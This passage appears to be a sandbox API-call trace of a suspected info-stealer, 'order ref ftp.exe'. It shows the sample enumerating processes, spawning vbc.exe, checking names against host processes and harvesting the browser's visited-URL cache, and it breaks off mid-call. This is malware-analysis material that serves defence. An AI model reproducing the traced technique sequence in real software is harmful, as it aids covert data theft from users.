th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0067.015] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf18) returned 0x0 [0067.015] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x820, pcPriClassBase=8, dwFlags=0x0, szExeFile="order ref ftp.exe")) returned 1 [0067.015] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xfcc) returned 0x184 [0067.016] GetModuleFileNameExW (in: hProcess=0x184, hModule=0x0, lpFilename=0x19680c, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\order ref ftp.exe")) returned 0x2f [0067.016] wcscpy (in: _Dest=0x196c48, _Source="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.exe" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.exe") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\order ref ftp.exe" [0067.016] GetProcessTimes (in: hProcess=0x184, lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70 | out: lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70) returned 1 [0067.016] CloseHandle (hObject=0x184) returned 1 [0067.016] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x318, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0067.016] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xad0) returned 0x184 [0067.016] GetModuleFileNameExW (in: hProcess=0x184, hModule=0x0, lpFilename=0x19680c, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe")) returned 0x21 [0067.016] wcscpy (in: _Dest=0x196c48, _Source="C:\\Windows\\System32\\taskhostw.exe" | out: _Dest="C:\\Windows\\System32\\taskhostw.exe") returned="C:\\Windows\\System32\\taskhostw.exe" [0067.016] GetProcessTimes (in: hProcess=0x184, lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70 | out: lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70) returned 1 [0067.016] CloseHandle (hObject=0x184) returned 1 [0067.016] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0067.017] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x818) returned 0x184 [0067.017] GetModuleFileNameExW (in: hProcess=0x184, hModule=0x0, lpFilename=0x19680c, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0067.017] wcscpy (in: _Dest=0x196c48, _Source="C:\\Windows\\System32\\svchost.exe" | out: _Dest="C:\\Windows\\System32\\svchost.exe") returned="C:\\Windows\\System32\\svchost.exe" [0067.017] GetProcessTimes (in: hProcess=0x184, lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70 | out: lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70) returned 1 [0067.017] CloseHandle (hObject=0x184) returned 1 [0067.017] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0067.018] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xd24) returned 0x0 [0067.018] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0067.018] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xd28) returned 0x0 [0067.018] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x240, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0067.019] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xe2c) returned 0x184 [0067.019] GetModuleFileNameExW (in: hProcess=0x184, hModule=0x0, lpFilename=0x19680c, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\backgroundTaskHost.exe" (normalized: "c:\\windows\\system32\\backgroundtaskhost.exe")) returned 0x2a [0067.019] wcscpy (in: _Dest=0x196c48, _Source="C:\\Windows\\System32\\backgroundTaskHost.exe" | out: _Dest="C:\\Windows\\System32\\backgroundTaskHost.exe") returned="C:\\Windows\\System32\\backgroundTaskHost.exe" [0067.019] GetProcessTimes (in: hProcess=0x184, lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70 | out: lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70) returned 1 [0067.019] CloseHandle (hObject=0x184) returned 1 [0067.019] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x240, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0067.019] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xda0) returned 0x0 [0067.019] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xfcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="vbc.exe")) returned 1 [0067.020] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc54) returned 0x184 [0067.020] GetModuleFileNameExW (in: hProcess=0x184, hModule=0x0, lpFilename=0x19680c, nSize=0x104 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\vbc.exe")) returned 0x35 [0067.020] wcscpy (in: _Dest=0x196c48, _Source="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe" | out: _Dest="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe") returned="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe" [0067.020] GetProcessTimes (in: hProcess=0x184, lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70 | out: lpCreationTime=0x196e58, lpExitTime=0x196e60, lpKernelTime=0x196e68, lpUserTime=0x196e70) returned 1 [0067.020] CloseHandle (hObject=0x184) returned 1 [0067.020] Process32NextW (in: hSnapshot=0x174, lppe=0x196a18 | out: lppe=0x196a18*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xfcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="vbc.exe")) returned 0 [0067.021] CloseHandle (hObject=0x174) returned 1 [0067.021] _wcsicmp (_String1="", _String2="dllhost.exe") returned -100 [0067.021] _wcsicmp (_String1="", _String2="taskhost.exe") returned -116 [0067.021] _wcsicmp (_String1="", _String2="taskhostex.exe") returned -116 [0067.021] _wcsicmp (_String1="", _String2="dllhost.exe") returned -100 [0067.021] _wcsicmp (_String1="", _String2="taskhost.exe") returned -116 [0067.021] _wcsicmp (_String1="", _String2="taskhostex.exe") returned -116 [0067.021] _wcsicmp (_String1="", _String2="dllhost.exe") returned -100 [0067.021] _wcsicmp (_String1="", _String2="taskhost.exe") returned -116 [0067.021] _wcsicmp (_String1="", _String2="taskhostex.exe") returned -116 [0067.021] _wcsicmp (_String1="", _String2="dllhost.exe") returned -100 [0067.021] _wcsicmp (_String1="", _String2="taskhost.exe") returned -116 [0067.021] _wcsicmp (_String1="", _String2="taskhostex.exe") returned -116 [0067.021] _wcsicmp (_String1="", _String2="dllhost.exe") returned -100 [0067.021] _wcsicmp (_String1="", _String2="taskhost.exe") returned -116 [0067.021] _wcsicmp (_String1="", _String2="taskhostex.exe") returned -116 [0067.021] _wcsicmp (_String1="", _String2="dllhost.exe") returned -100 [0067.021] _wcsicmp (_String1="", _String2="taskhost.exe") returned -116 [0067.021] _wcsicmp (_String1="", _String2="taskhostex.exe") returned -116 [0067.021] _wcsicmp (_String1="", _String2="dllhost.exe") returned -100 [0067.021] _wcsicmp (_String1="", _String2="taskhost.exe") returned -116 [0067.021] _wcsicmp (_String1="", _String2="taskhostex.exe") returned -116 [0067.021] _wcsicmp (_String1="", _String2="dllhost.exe") returned -100 [0067.021] _wcsicmp (_String1="", _String2="taskhost.exe") returned -116 [0067.021] _wcsicmp (_String1="", _String2="taskhostex.exe") returned -116 [0067.021] _wcsicmp (_String1="", _String2="dllhost.exe") returned -100 [0067.021] _wcsicmp (_String1="", _String2="taskhost.exe") returned -116 [0067.021] _wcsicmp (_String1="", _String2="taskhostex.exe") returned -116 [0067.021] _wcsicmp (_String1="", _String2="dllhost.exe") returned -100 [0067.021] _wcsicmp (_String1="", _String2="taskhost.exe") returned -116 [0067.021] _wcsicmp (_String1="", _String2="taskhostex.exe") returned -116 [0067.021] _wcsicmp (_String1="", _String2="dllhost.exe") returned -100 [0067.021] _wcsicmp (_String1="", _String2="taskhost.exe") returned -116 [0067.021] _wcsicmp (_String1="", _String2="taskhostex.exe") returned -116 [0067.021] _wcsicmp (_String1="", _String2="dllhost.exe") returned -100 [0067.021] _wcsicmp (_String1="", _String2="taskhost.exe") returned -116 [0067.021] _wcsicmp (_String1="", _String2="taskhostex.exe") returned -116 [0067.021] _wcsicmp (_String1="", _String2="dllhost.exe") returned -100 [0067.021] _wcsicmp (_String1="", _String2="taskhost.exe") returned -116 [0067.021] _wcsicmp (_String1="", _String2="taskhostex.exe") returned -116 [0067.021] _wcsicmp (_String1="", _String2="dllhost.exe") returned -100 [0067.021] _wcsicmp (_String1="", _String2="taskhost.exe") returned -116 [0067.021] _wcsicmp (_String1="", _String2="taskhostex.exe") returned -116 [0067.021] _wcsicmp (_String1="", _String2="dllhost.exe") returned -100 [0067.021] _wcsicmp (_String1="", _String2="taskhost.exe") returned -116 [0067.021] _wcsicmp (_String1="", _String2="taskhostex.exe") returned -116 [0067.021] _wcsicmp (_String1="", _String2="dllhost.exe") returned -100 [0067.021] _wcsicmp (_String1="", _String2="taskhost.exe") returned -116 [0067.021] _wcsicmp (_String1="", _String2="taskhostex.exe") returned -116 [0067.021] _wcsicmp (_String1="", _String2="dllhost.exe") returned -100 [0067.021] _wcsicmp (_String1="", _String2="taskhost.exe") returned -116 [0067.021] _wcsicmp (_String1="", _String2="taskhostex.exe") returned -116 [0067.022] _wcsicmp (_String1="", _String2="dllhost.exe") returned -100 [0067.022] _wcsicmp (_String1="", _String2="taskhost.exe") returned -116 [0067.022] _wcsicmp (_String1="", _String2="taskhostex.exe") returned -116 [0067.022] _wcsicmp (_String1="", _String2="dllhost.exe") returned -100 [0067.022] _wcsicmp (_String1="", _String2="taskhost.exe") returned -116 [0067.022] _wcsicmp (_String1="", _String2="taskhostex.exe") returned -116 [0067.022] _wcsicmp (_String1="", _String2="dllhost.exe") returned -100 [0067.022] _wcsicmp (_String1="", _String2="taskhost.exe") returned -116 [0067.022] _wcsicmp (_String1="", _String2="taskhostex.exe") returned -116 [0067.022] _wcsicmp (_String1="", _String2="dllhost.exe") returned -100 [0067.022] _wcsicmp (_String1="", _String2="taskhost.exe") returned -116 [0067.022] _wcsicmp (_String1="", _String2="taskhostex.exe") returned -116 [0067.022] _wcsicmp (_String1="", _String2="dllhost.exe") returned -100 [0067.022] _wcsicmp (_String1="", _String2="taskhost.exe") returned -116 [0067.022] _wcsicmp (_String1="", _String2="taskhostex.exe") returned -116 [0067.022] _wcsicmp (_String1="sihost.exe", _String2="dllhost.exe") returned 15 [0067.022] _wcsicmp (_String1="sihost.exe", _String2="taskhost.exe") returned -1 [0067.022] _wcsicmp (_String1="sihost.exe", _String2="taskhostex.exe") returned -1 [0067.022] _wcsicmp (_String1="taskhostw.exe", _String2="dllhost.exe") returned 16 [0067.022] _wcsicmp (_String1="taskhostw.exe", _String2="taskhost.exe") returned 73 [0067.022] _wcsicmp (_String1="taskhostw.exe", _String2="taskhostex.exe") returned 18 [0067.022] _wcsicmp (_String1="RuntimeBroker.exe", _String2="dllhost.exe") returned 14 [0067.022] _wcsicmp (_String1="RuntimeBroker.exe", _String2="taskhost.exe") returned -2 [0067.022] _wcsicmp (_String1="RuntimeBroker.exe", _String2="taskhostex.exe") returned -2 [0067.022] _wcsicmp (_String1="explorer.exe", _String2="dllhost.exe") returned 1 [0067.022] _wcsicmp (_String1="explorer.exe", _String2="taskhost.exe") returned -15 [0067.022] _wcsicmp (_String1="explorer.exe", _String2="taskhostex.exe") returned -15 [0067.022] _wcsicmp (_String1="ShellExperienceHost.exe", _String2="dllhost.exe") returned 15 [0067.022] _wcsicmp (_String1="ShellExperienceHost.exe", _String2="taskhost.exe") returned -1 [0067.022] _wcsicmp (_String1="ShellExperienceHost.exe", _String2="taskhostex.exe") returned -1 [0067.022] _wcsicmp (_String1="SearchUI.exe", _String2="dllhost.exe") returned 15 [0067.022] _wcsicmp (_String1="SearchUI.exe", _String2="taskhost.exe") returned -1 [0067.022] _wcsicmp (_String1="SearchUI.exe", _String2="taskhostex.exe") returned -1 [0067.022] _wcsicmp (_String1="hadgdp.exe", _String2="dllhost.exe") returned 4 [0067.022] _wcsicmp (_String1="hadgdp.exe", _String2="taskhost.exe") returned -12 [0067.022] _wcsicmp (_String1="hadgdp.exe", _String2="taskhostex.exe") returned -12 [0067.022] _wcsicmp (_String1="mergerbass.exe", _String2="dllhost.exe") returned 9 [0067.022] _wcsicmp (_String1="mergerbass.exe", _String2="taskhost.exe") returned -7 [0067.022] _wcsicmp (_String1="mergerbass.exe", _String2="taskhostex.exe") returned -7 [0067.022] _wcsicmp (_String1="italianbreakfast.exe", _String2="dllhost.exe") returned 5 [0067.022] _wcsicmp (_String1="italianbreakfast.exe", _String2="taskhost.exe") returned -11 [0067.022] _wcsicmp (_String1="italianbreakfast.exe", _String2="taskhostex.exe") returned -11 [0067.022] _wcsicmp (_String1="merger raw.exe", _String2="dllhost.exe") returned 9 [0067.022] _wcsicmp (_String1="merger raw.exe", _String2="taskhost.exe") returned -7 [0067.022] _wcsicmp (_String1="merger raw.exe", _String2="taskhostex.exe") returned -7 [0067.022] _wcsicmp (_String1="protein announcements processes.exe", _String2="dllhost.exe") returned 12 [0067.022] _wcsicmp (_String1="protein announcements processes.exe", _String2="taskhost.exe") returned -4 [0067.022] _wcsicmp (_String1="protein announcements processes.exe", _String2="taskhostex.exe") returned -4 [0067.022] _wcsicmp (_String1="cdt_expenditure_vincent.exe", _String2="dllhost.exe") returned -1 [0067.022] _wcsicmp (_String1="cdt_expenditure_vincent.exe", _String2="taskhost.exe") returned -17 [0067.022] _wcsicmp (_String1="cdt_expenditure_vincent.exe", _String2="taskhostex.exe") returned -17 [0067.022] _wcsicmp (_String1="woundchristopher.exe", _String2="dllhost.exe") returned 19 [0067.022] _wcsicmp (_String1="woundchristopher.exe", _String2="taskhost.exe") returned 3 [0067.022] _wcsicmp (_String1="woundchristopher.exe", _String2="taskhostex.exe") returned 3 [0067.022] _wcsicmp (_String1="irrigation_teach.exe", _String2="dllhost.exe") returned 5 [0067.023] _wcsicmp (_String1="irrigation_teach.exe", _String2="taskhost.exe") returned -11 [0067.023] _wcsicmp (_String1="irrigation_teach.exe", _String2="taskhostex.exe") returned -11 [0067.023] _wcsicmp (_String1="suspect promoting stroke.exe", _String2="dllhost.exe") returned 15 [0067.023] _wcsicmp (_String1="suspect promoting stroke.exe", _String2="taskhost.exe") returned -1 [0067.023] _wcsicmp (_String1="suspect promoting stroke.exe", _String2="taskhostex.exe") returned -1 [0067.023] _wcsicmp (_String1="piepokemon.exe", _String2="dllhost.exe") returned 12 [0067.023] _wcsicmp (_String1="piepokemon.exe", _String2="taskhost.exe") returned -4 [0067.023] _wcsicmp (_String1="piepokemon.exe", _String2="taskhostex.exe") returned -4 [0067.023] _wcsicmp (_String1="fo deutsch.exe", _String2="dllhost.exe") returned 2 [0067.023] _wcsicmp (_String1="fo deutsch.exe", _String2="taskhost.exe") returned -14 [0067.023] _wcsicmp (_String1="fo deutsch.exe", _String2="taskhostex.exe") returned -14 [0067.023] _wcsicmp (_String1="complete_paso_altered.exe", _String2="dllhost.exe") returned -1 [0067.023] _wcsicmp (_String1="complete_paso_altered.exe", _String2="taskhost.exe") returned -17 [0067.023] _wcsicmp (_String1="complete_paso_altered.exe", _String2="taskhostex.exe") returned -17 [0067.023] _wcsicmp (_String1="array_matched_latitude.exe", _String2="dllhost.exe") returned -3 [0067.023] _wcsicmp (_String1="array_matched_latitude.exe", _String2="taskhost.exe") returned -19 [0067.023] _wcsicmp (_String1="array_matched_latitude.exe", _String2="taskhostex.exe") returned -19 [0067.023] _wcsicmp (_String1="segments-nhs-bee.exe", _String2="dllhost.exe") returned 15 [0067.023] _wcsicmp (_String1="segments-nhs-bee.exe", _String2="taskhost.exe") returned -1 [0067.023] _wcsicmp (_String1="segments-nhs-bee.exe", _String2="taskhostex.exe") returned -1 [0067.023] _wcsicmp (_String1="readily knives.exe", _String2="dllhost.exe") returned 14 [0067.023] _wcsicmp (_String1="readily knives.exe", _String2="taskhost.exe") returned -2 [0067.023] _wcsicmp (_String1="readily knives.exe", _String2="taskhostex.exe") returned -2 [0067.023] _wcsicmp (_String1="barry_slovenia_won.exe", _String2="dllhost.exe") returned -2 [0067.023] _wcsicmp (_String1="barry_slovenia_won.exe", _String2="taskhost.exe") returned -18 [0067.023] _wcsicmp (_String1="barry_slovenia_won.exe", _String2="taskhostex.exe") returned -18 [0067.023] _wcsicmp (_String1="livearticle.exe", _String2="dllhost.exe") returned 8 [0067.023] _wcsicmp (_String1="livearticle.exe", _String2="taskhost.exe") returned -8 [0067.023] _wcsicmp (_String1="livearticle.exe", _String2="taskhostex.exe") returned -8 [0067.023] _wcsicmp (_String1="inn_creation.exe", _String2="dllhost.exe") returned 5 [0067.023] _wcsicmp (_String1="inn_creation.exe", _String2="taskhost.exe") returned -11 [0067.023] _wcsicmp (_String1="inn_creation.exe", _String2="taskhostex.exe") returned -11 [0067.023] _wcsicmp (_String1="demand_sony_leeds.exe", _String2="dllhost.exe") returned -7 [0067.023] _wcsicmp (_String1="demand_sony_leeds.exe", _String2="taskhost.exe") returned -16 [0067.023] _wcsicmp (_String1="demand_sony_leeds.exe", _String2="taskhostex.exe") returned -16 [0067.023] _wcsicmp (_String1="optimize-dressing.exe", _String2="dllhost.exe") returned 11 [0067.023] _wcsicmp (_String1="optimize-dressing.exe", _String2="taskhost.exe") returned -5 [0067.023] _wcsicmp (_String1="optimize-dressing.exe", _String2="taskhostex.exe") returned -5 [0067.023] _wcsicmp (_String1="", _String2="dllhost.exe") returned -100 [0067.023] _wcsicmp (_String1="", _String2="taskhost.exe") returned -116 [0067.023] _wcsicmp (_String1="", _String2="taskhostex.exe") returned -116 [0067.023] _wcsicmp (_String1="order ref ftp.exe", _String2="dllhost.exe") returned 11 [0067.023] _wcsicmp (_String1="order ref ftp.exe", _String2="taskhost.exe") returned -5 [0067.023] _wcsicmp (_String1="order ref ftp.exe", _String2="taskhostex.exe") returned -5 [0067.023] _wcsicmp (_String1="taskhostw.exe", _String2="dllhost.exe") returned 16 [0067.023] _wcsicmp (_String1="taskhostw.exe", _String2="taskhost.exe") returned 73 [0067.023] _wcsicmp (_String1="taskhostw.exe", _String2="taskhostex.exe") returned 18 [0067.023] _wcsicmp (_String1="svchost.exe", _String2="dllhost.exe") returned 15 [0067.023] _wcsicmp (_String1="svchost.exe", _String2="taskhost.exe") returned -1 [0067.023] _wcsicmp (_String1="svchost.exe", _String2="taskhostex.exe") returned -1 [0067.023] _wcsicmp (_String1="", _String2="dllhost.exe") returned -100 [0067.023] _wcsicmp (_String1="", _String2="taskhost.exe") returned -116 [0067.023] _wcsicmp (_String1="", _String2="taskhostex.exe") returned -116 [0067.023] _wcsicmp (_String1="", _String2="dllhost.exe") returned -100 [0067.024] _wcsicmp (_String1="", _String2="taskhost.exe") returned -116 [0067.024] _wcsicmp (_String1="", _String2="taskhostex.exe") returned -116 [0067.024] _wcsicmp (_String1="backgroundTaskHost.exe", _String2="dllhost.exe") returned -2 [0067.024] _wcsicmp (_String1="backgroundTaskHost.exe", _String2="taskhost.exe") returned -18 [0067.024] _wcsicmp (_String1="backgroundTaskHost.exe", _String2="taskhostex.exe") returned -18 [0067.024] _wcsicmp (_String1="", _String2="dllhost.exe") returned -100 [0067.024] _wcsicmp (_String1="", _String2="taskhost.exe") returned -116 [0067.024] _wcsicmp (_String1="", _String2="taskhostex.exe") returned -116 [0067.024] _wcsicmp (_String1="vbc.exe", _String2="dllhost.exe") returned 18 [0067.024] _wcsicmp (_String1="vbc.exe", _String2="taskhost.exe") returned 2 [0067.024] _wcsicmp (_String1="vbc.exe", _String2="taskhostex.exe") returned 2 [0067.024] FreeLibrary (hLibModule=0x76ec0000) returned 1 [0067.024] FindFirstUrlCacheEntryW (in: lpszUrlSearchPattern="visited:", lpFirstCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpFirstCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 0x1 [0067.290] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/d4uaT.flv") returned 0x3c [0067.290] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.290] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH", _String2="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/d4uaT.flv") returned -1 [0067.290] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH") returned 0x38 [0067.290] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.290] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/emg2isSn89KH1rCqnkVE.mp3", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH") returned -1 [0067.290] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/emg2isSn89KH1rCqnkVE.mp3", _String2="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/d4uaT.flv") returned -1 [0067.290] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/emg2isSn89KH1rCqnkVE.mp3") returned 0x4e [0067.290] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.290] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ/5-kbYj32q24z/fxz4eUE2J3.jpg", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/emg2isSn89KH1rCqnkVE.mp3") returned 1 [0067.290] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ/5-kbYj32q24z/fxz4eUE2J3.jpg", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH") returned 1 [0067.290] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ/5-kbYj32q24z/fxz4eUE2J3.jpg", _String2="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/d4uaT.flv") returned -1 [0067.290] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ/5-kbYj32q24z/fxz4eUE2J3.jpg") returned 0x55 [0067.290] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.290] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/27QyANvwCf-Uw/81P7puIlOgX.jpg", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ/5-kbYj32q24z/fxz4eUE2J3.jpg") returned -1 [0067.290] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/27QyANvwCf-Uw/81P7puIlOgX.jpg", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/emg2isSn89KH1rCqnkVE.mp3") returned 1 [0067.290] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/27QyANvwCf-Uw/81P7puIlOgX.jpg", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH") returned 1 [0067.290] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/27QyANvwCf-Uw/81P7puIlOgX.jpg", _String2="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/d4uaT.flv") returned -1 [0067.290] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/27QyANvwCf-Uw/81P7puIlOgX.jpg") returned 0x5e [0067.291] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.291] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/tW6w.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/27QyANvwCf-Uw/81P7puIlOgX.jpg") returned -1 [0067.291] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/tW6w.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ/5-kbYj32q24z/fxz4eUE2J3.jpg") returned -1 [0067.291] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/tW6w.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/emg2isSn89KH1rCqnkVE.mp3") returned 1 [0067.291] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/tW6w.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH") returned -1 [0067.291] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/tW6w.m4a", _String2="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/d4uaT.flv") returned -1 [0067.291] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/tW6w.m4a") returned 0x3e [0067.291] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: 